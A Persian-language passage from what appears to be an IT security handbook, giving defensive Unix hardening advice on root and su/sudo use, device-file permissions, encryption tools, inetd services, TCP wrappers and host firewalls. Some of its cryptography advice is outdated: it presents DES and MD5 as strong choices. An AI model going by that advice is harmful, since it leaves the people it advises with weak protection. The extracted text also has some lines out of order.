ﺩﺭ ﮔﺬﺷﺘﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺑﺰﺭﮒ ،ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ،ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ،ﻭ ﻳﺎ ﺩﺭ clusterﻫﺎﻳﻲ ﺍﺯ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ
ﺑﺎ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺷﺒﻜﻪﺍﻱ ﺁﺭﺍﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﺪﻧﺪ .ﺍﻣﺮﻭﺯﻩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺍﺯ ﺁﻧﺠﺎﻛﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻪ Unixﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺩ ﺭﻭﻱ
ﻫﺮ ﻧﺴﺨﺔ ،Unixﺍﺧﺘﺼﺎﺻﻲ ﺍﺳﺖ ﻭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺗﻮﺿﻴﺤﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﺨﺔ Unixﺧﺎﺻﻲ ﻛﻪ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺑﺨﻮﺍﻧﻴـﺪ.
ﭼﻨﺪﻳﻦ ﻛﺘﺎﺏ ،ﭘﺎﻳﮕﺎﻩ ﻭﺏ ،ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺧﻮﺏ ﭘﺴﺘﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ Unixﺩﺭ ﺿﻤﻴﻤﺔ ﺩﻭﻡ ﺗﺎ ﭘﻨﺠﻢ ﻛﺘﺎﺏ ﺁﻭﺭﺩﻩ ﺷﺪﻩﺍﻧﺪ.
ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﺑﺮﺍﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻜﺴﺎﻥ ﺍﺳﺖ ﺑﺎﻳﺪ ﺍﺯ "ﮔﺮﻭﻫﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ" ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ.
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ ،Unixﻛﺎﺭﺑﺮ ) rootﻛﻪ UIDﺁﻥ ﺑﺮﺍﺑﺮ ﺻﻔﺮ ﻣﻲﺑﺎﺷﺪ( "ﺍﺑﺮﻛﺎﺭﺑﺮ" ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ
ﻻ ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮ ﺩﺭ ﻫـﺮ ﺟﻨﺒـﺔ
ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺍﺭﺩ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ ،ﺩﺭ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﻭ ﭘـﺮﺩﺍﺯﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺎ ﺍﻣﺘﻴـﺎﺯﺍﺕ
rootﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺍﻫﻤﻴﺖ ﻭﻳﮋﻩﺍﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﺯ ﺑﻜﺎﺭﺑﺮﺩﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻭ ﻣﻌﻤـﻮﻟﻲ
ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ ،ﻭ ﺍﻣﮑﺎﻥ ﻭﺭﻭﺩ ﺁﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ ﻭ ﻫﻨﮕﺎﻡ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ،rootﺍﺯ ﺩﺳـﺘﻮﺭ ) suﻳـﺎ
ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺁﻥ ﻣﺜﻞ (sudoﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺳﻄﺢ ﻳﮏ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻌﻤﻮﻟﻲ ﺑﻪ ﺳـﻄﺢ ﺩﺳﺘﺮﺳـﻲ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﺗﺒﺪﻳﻞ ﮐﻨﻴﺪ .ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺛﺒﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻫﻢ ﻣﻬﺎﺟﻢ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺑـﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ،ﺩﻭ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﺪ .ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭﺍﺗﻲ ﻣﺎﻧﻨﺪ suﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﻣﺤـﺪﻭﺩ ﻛﻨﻴـﺪ؛ ﮔﺮﻓﺘﻦ ﺩﺳﺘﺮﺳ ﹺ
ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﮔﺮﻭﻩ wheelﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ suﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
۳۴۶ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺍﻳﻦ ﻗﺴﻤﺖ ﻋﺒﺎﺭﺗﻬﺎﻱ " "Unixﻭ "ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ "Unixﺑﻪ ﻳﻚ ﻣﻌﻨﻲ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ .ﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰﻻ ﺍﺯ ﻭﺍﮊﺓ Unixﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺍﻳـﻦ
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ Linuxﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ Unixﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٤٢
ﺑﻌﻀﻲ ﻧﺴﺨﻪﻫﺎﻱ Unixﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺟﺮﺍﻱ ﺳﻴﺴﺘﻢ ،ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﺎﺭﺑﺮ rootﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻳﺎ ﺳﻄﻮﺡ ﺍﻣﻨﻴﺘﻲ
ﻫﺴﺘﻪ ﻣﺤﺪﻭﺩ ﻛﻨﻨﺪ .ﻣﺴﺘﻨﺪﺍﺕ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺍﮔـﺮ
ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺣﺴﺎﺳﻲ ﺩﺍﺭﻳﺪ ﺑﻬﺘﺮ ﺍﺳﺖ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺭﻭﻱ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻴـﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ
ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻥ ﺣﺴﺎﺏ ،rootﺍﺯ ﻟﻮ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﻧﺎﻣـﺔ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻧﻴـﺰ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺳﻴـﺴﺘﻢ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬﺎ ﻓﺎﻳﺪﻩﺍﻱ ﻧﺪﺍﺭﺩ ،ﭼﻮﻥ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ
ﺑﺮﻧﺎﻣﻪ ،ﻳﻚ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻧﻴﺰ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
347 Others
٤٤٣ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
Unixﺑﺎ ﺗﻤﺎﻡ ﻭﺳﺎﻳﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺼﻮﺭﺕ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﭼﺎﭘﮕﺮﻫـﺎ ،ﭘﻮﺭﺗﻬـﺎﻱ ﺳـﺮﻳﺎﻝ ،ﺩﻳـﺴﻜﻬﺎﻱ
ﺳﺨﺖ ،ﻭ ﺣﺘﻲ ﺣﺎﻓﻈﺔ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ ٣٤٨ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ .ﻫﺮﭼﻨﺪ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ ﻋﻤﻮﻣﹰﺎ ﺩﺭ ﺷﺎﺧﺔ /devﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ،
ﺍﻣﺎ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﻛﺎﻓﻲ ﺑﺎﺷﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﺑﺮﻛﺎﺭﺑﺮ( ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﺑﺴﺎﺯﺩ .ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺣﺎﻓﻈـﺔ
ﺳﻴﺴﺘﻢ ﺑﺨﻮﺍﻧﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ؛ ﻭ ﺍﮔـﺮ ﺑﺘﻮﺍﻧـﺪ ﺩﺭ ﺣﺎﻓﻈـﺔ ﺳﻴـﺴﺘﻢ ﺑﻨﻮﻳـﺴﺪ ،ﻣـﻲﺗﻮﺍﻧـﺪ
ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﺎﻳﺪ .ﺩﺭ ﻣﻮﺭﺩ ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺧﺎﻡ )ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ( ﺩﺍﺩﻩﻫـﺎﻱ ﺩﻳـﺴﻚ ﺭﺍ ﺩﺳـﺘﻜﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ ﻭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻭﺳﺎﻳﻞ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻃﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﺮﺩ .ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ ﻭ
ﻣﺠﻮﺯﻫﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ ،ﺻﺤﻴﺢ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ mountﻛﻨﻴﺪ ﻛﻪ ﻭﺳﺎﻳﻞ ﺩﺭ ﺁﻥ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﺪ
)ﺑـﺼﻮﺭﺕ ،(nodevﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﻣﻜـﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺍﻳـﻦ ﻭﻳﮋﮔـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺩﺭ ﺑﺮﺧـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﻳـﻚ ﻓﺎﻳـﻞ ﺑـﻪ ﻧـﺎﻡ
logindevpermﻳﺎ fbtabﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﺧﻮﺩ ﭘﺎﻳﺎﻧﻪ )ﻭ ﻧﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ( ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷـﻮﺩ ،ﻣﺠﻮﺯﻫـﺎﻱ
ﻭﺳﺎﻳﻞ ﭼﮕﻮﻧﻪ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ )ﻣﺜ ﹰﻼ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻨﻜﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﻣﻴﻜﺮﻭﻓﻮﻥ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ ﻭ ﺍﺗﺎﻕ ﺭﺍ ﺗﺤﺖ ﻧﻈـﺮ ﺑﮕﻴـﺮﺩ( .ﺍﮔـﺮ ﭼﻨـﻴﻦ
ﻓﺎﻳﻠﻲ ﺩﺭ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﺻﺤﻴﺢ ﺁﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺩﺳﺘﻮﺭﺍﺕ ﻣﺘﻌﺪﺩﻱ ﺩﺭ Unixﺑﺮﺍﻱ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻛﺮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ،ﻭﻟﻲ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻣﻨﺎﺳـﺐ ﻧﻴـﺴﺘﻨﺪ .ﺍﺯ rot13ﻳـﺎ
cryptﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ،ﭼﻮﻥ ﺑﺮﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ desﻳﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎﻱ
opensslﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺴﺘﺤﻜﻢ ﺩﺳﺖ ﻳﺎﻓﺖ .ﺑﺮﺍﻱ ﺍﺳﺘﺤﮑﺎﻡ ﺑﻴﺸﺘﺮ ﺳﺮﺟﻤﻊﻫﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺳـﺘﻮﺭ sumﺍﺗﻜـﺎ
ﻧﻜﻨﻴﺪ ﻭ ﺩﺭﻋﻮﺽ ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ،md5sum ،md5ﻳﺎ opensslﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﺷﺒﻜﻪﻫﺎﻱ TCP/IP
ﻏﺎﻟﺒﹰﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺷـﺒﻜﻪ ﺗﻮﺳـﻂ ) inetdﻳـﺎ (xinetd
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﺷﻮﻧﺪ .ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﻳﻦ daemonﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ؛ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ ﺭﺍ ﺑـﺎ
ﻳﮏ tcpwapper daemonﺑﻪ ﻧﺎﻡ tcpdﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ ،ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ inetdﺧﻮﺩﺵ ﺍﺯ ﭘﻮﺷﺸﻬﺎﻱ TCPﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ.
ﻫﻨﮕﺎﻡ ﺭﻭﺷﻦﺷﺪﻥ ﺳﻴﺴﺘﻢ ،ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻭﻥ ﺷﺎﺧﻪﻫﺎﻱ /etc/init.dﻳﺎ /etc/rc*.dﻳﺎ ﻓﺎﻳﻠﻬـﺎﻱ /etc/rc
ﻭ /etc/rc.localﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﺍﺯ ﺳﺮﻭﻳﺴﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﺑﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺜﻞ fingerdﻛﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ
ﺑﺎ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺑﻪ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺩﻫﻨﺪ ﺗﻮﺟﻪ ﺧﺎﺹ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻫﺮ ﺳﻴﺴﺘﻢ Unixﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺑـﺮﺍﻱ ﺍﻃـﻼﻉ ﺍﺯ
ﻭﺟﻮﺩ ﻭ ﻧﺤﻮﺓ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻪ ﻣﺴﺘﻨﺪﺍﺕ ﺁﻥ ﺭﺟﻮﻉ ﻛﻨﻴﺪ .ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ
ipchains ،ipfwﻭ .iptablesﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﺎﻳﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛـﻪ ﻓﻘـﻂ ﺑـﻪ ﺑـﺴﺘﻪﻫـﺎﻳﻲ ﺍﺟـﺎﺯﻩ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ
ﻣﻘﺼﺪﺷﺎﻥ ﺧﺪﻣﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺭﺍﺋﻪ ﺩﻫﻴﺪ .ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ
ﺧﻮﺩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ )ﻣﺎﻧﻨﺪ (RIP ،Samba ،LPD ،NTP ،NFS ،SNMPﻧﻴﺰ ﺑﺎﻳﺪ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﺎﺭﺟﻲ ﺑﻪ ﻛـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ .ﺩﺭﺻـﻮﺭﺕ
ﺍﻣﻜﺎﻥ ﺍﺯ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﺴﺘﺎ ٣٤٩ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﺩﺭ ﮔﺬﺷﺘﻪ ﺧﺪﻣﺎﺕ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻳﺎ ﺁﺩﺭﺱ IPﻣﺸﺘﺮﻱ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﻛﻪ ﺑـﺼﻮﺭﺕ
ﻣﺘﻦﺳﺎﺩﻩ ﺭﻭﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ .ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﻣﻦ ﻧﻴﺴﺘﻨﺪ .ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ
